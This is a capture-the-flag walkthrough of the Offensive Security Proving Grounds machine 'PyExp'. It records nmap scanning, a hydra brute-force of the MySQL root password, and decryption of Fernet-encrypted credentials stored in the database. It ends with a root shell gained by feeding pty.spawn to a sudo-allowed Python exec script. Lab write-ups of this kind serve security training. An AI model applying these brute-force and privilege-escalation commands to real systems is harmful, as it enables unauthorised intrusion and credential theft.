PyExp
Date: June 4th 2022
Author: j.info
Link: Proving Grounds on Offensive Security
PG Difficulty Rating: Easy
Objectives
- local.txt flag
- proof.txt flag
Initial Enumeration
Nmap Scan
sudo nmap -sV -sC -T4 192.168.57.118
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, FoundRows, SupportsCompression, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, Speaks41ProtocolOld, InteractiveClient, LongColumnFlag, Support41Auth, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: YD+Fa5%Xm<$::Tw|+[hx
|_ Auth Plugin Name: mysql_native_password
An additional all ports scan showed us:
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
SQL Digging
I run another nmap against the database port using scripts and find some usernames:
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 192.168.57.118
| mysql-enum:
| Valid usernames:
| root:<empty> - Valid credentials
| netadmin:<empty> - Valid credentials
| guest:<empty> - Valid credentials
| user:<empty> - Valid credentials
| web:<empty> - Valid credentials
| sysadmin:<empty> - Valid credentials
| administrator:<empty> - Valid credentials
| webadmin:<empty> - Valid credentials
| admin:<empty> - Valid credentials
| test:<empty> - Valid credentials
I try and login with these but it doesn’t work on any of them.
I give hydra a try and am able to brute force the password for root:
hydra -l root -P rockyou.txt 192.168.57.118 mysql
[DATA] attacking mysql://192.168.57.118:3306/
[STATUS] 1633.00 tries/min, 4899 tries in 00:03h, 14339500 to do in 146:22h, 4 active
[3306][mysql] host: 192.168.57.118 login: root password: <REDACTED>
1 of 1 target successfully completed, 1 valid password found
Logging into the database:
mysql -h 192.168.57.118 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 28097
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
show databases;
+--------------------+
| Database |
+--------------------+
| data |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
In the mysql database under the user table we’re able to find the root hash:
root | *E8F12B9427BF0A7B2B2EA610BD8ADBE683C4C262
And in the data database under the fernet table we see:
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred | keyy |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
I try and decode those strings with base64 since they look like they could be encoded that way but don’t have any luck.
I do a google search for fernet and find it’s a symmetric encryption algorithm. Given we have a key we should hopefully be able to decrypt the cred with the key.
I read about how to decrypt Fernet here at cryptography.io and write a quick python script to decrypt it:
from cryptography.fernet import Fernet
key = 'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
token = b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys='
f = Fernet(key)
print(f.decrypt(token))
And when running it with python3 fernet.py
we get back:
b'lucy:<REDACTED>'
System Access
It worked! We were able to decrypt a username and password with our script. Connecting over via ssh:
ssh lucy@192.168.57.118 -p 1337
lucy@192.168.57.118's password:
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lucy@pyexp:~$
System Enumeration
The local.txt flag is waiting for us in our home directory:
wc -c local.txt
33 local.txt
I check sudo -l
and see:
Matching Defaults entries for lucy on pyexp:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lucy may run the following commands on pyexp:
(root) NOPASSWD: /usr/bin/python2 /opt/exp.py
Take a look at the /opt/exp.py script:
uinput = raw_input('how are you?')
exec(uinput)
So this code will run whatever we input via exec.
I try and get it to run bash:
sudo /usr/bin/python2 /opt/exp.py
how are you?bash
Traceback (most recent call last):
File "/opt/exp.py", line 2, in <module>
exec(uinput)
File "<string>", line 1, in <module>
NameError: name 'bash' is not defined
raw_input() returns whatever you enter as a string as opposed to input() which will run any input as a python expression.
Root
After some experimentation trying different things the following worked for me and I was able to escalate over to root:
how are you?import pty;pty.spawn("/bin/bash")
root@pyexp:/home/lucy#
Checking out the proof.txt in /root:
wc -c /root/proof.txt
33 /root/proof.txt
With that we’ve completed this CTF!
Conclusion
A quick run down of what we covered in this CTF:
- Basic enumeration using nmap
- Using hydra to brute force our way into the exposed mysql database
- Finding some Fernet encrypted credentials and the encryption key stored in the database
- Writing a quick python script to decrypt the credentials allowing us to ssh over to the system for our initial foothold
- Looking at sudo -l and seeing we have the ability to run a specific python script as root, and using that to escalate to root
Many thanks to:
- Offensive Security for hosting this CTF